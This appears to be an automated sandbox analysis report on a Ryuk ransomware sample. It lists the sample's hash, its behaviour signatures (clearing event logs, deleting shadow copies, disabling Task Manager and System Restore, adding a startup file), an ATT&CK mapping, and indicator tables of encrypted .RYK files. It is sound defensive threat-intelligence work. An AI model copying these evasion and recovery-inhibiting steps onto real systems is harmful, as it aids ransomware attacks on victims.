Malware Analysis Report

2024-08-06 09:27

Sample ID 230311-b8r4esgb43
Target d2e194259106bca3b42dc8690d340b59.bin
SHA256 e895436da58025d7c077ab276708ee996125c811eb8d45f24e14d3facd9db10b
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e895436da58025d7c077ab276708ee996125c811eb8d45f24e14d3facd9db10b

Threat Level: Known bad

The file d2e194259106bca3b42dc8690d340b59.bin was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Clears Windows event logs

Deletes shadow copies

Disables taskbar notifications via registry modification

Disables use of System Restore points

Disables Task Manager via registry modification

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Creates scheduled task(s)

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
Indicator Removal on Host
T1070
File Deletion
T1107
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2023-03-11 01:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-11 01:49

Reported

2023-03-11 01:51

Platform

win7-20230220-en

Max time kernel

148s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A
N/A N/A C:\Windows\SysWOW64\wevtutil.exe N/A

Deletes shadow copies

ransomware

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00369_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105504.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8B.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199303.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21505_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAILMOD.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PPINTL.DLL.IDX_DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\STSUCRES.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BRCH98SP.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\ApproveOpen.mpeg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02276_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_ON.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_10.MID.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FDATE.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RE00006_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_SlateBlue.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BREEZE\BREEZE.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDIRM.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02368_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15073_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA000A.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115834.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.HXS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\WATERMAR.INF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02282_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

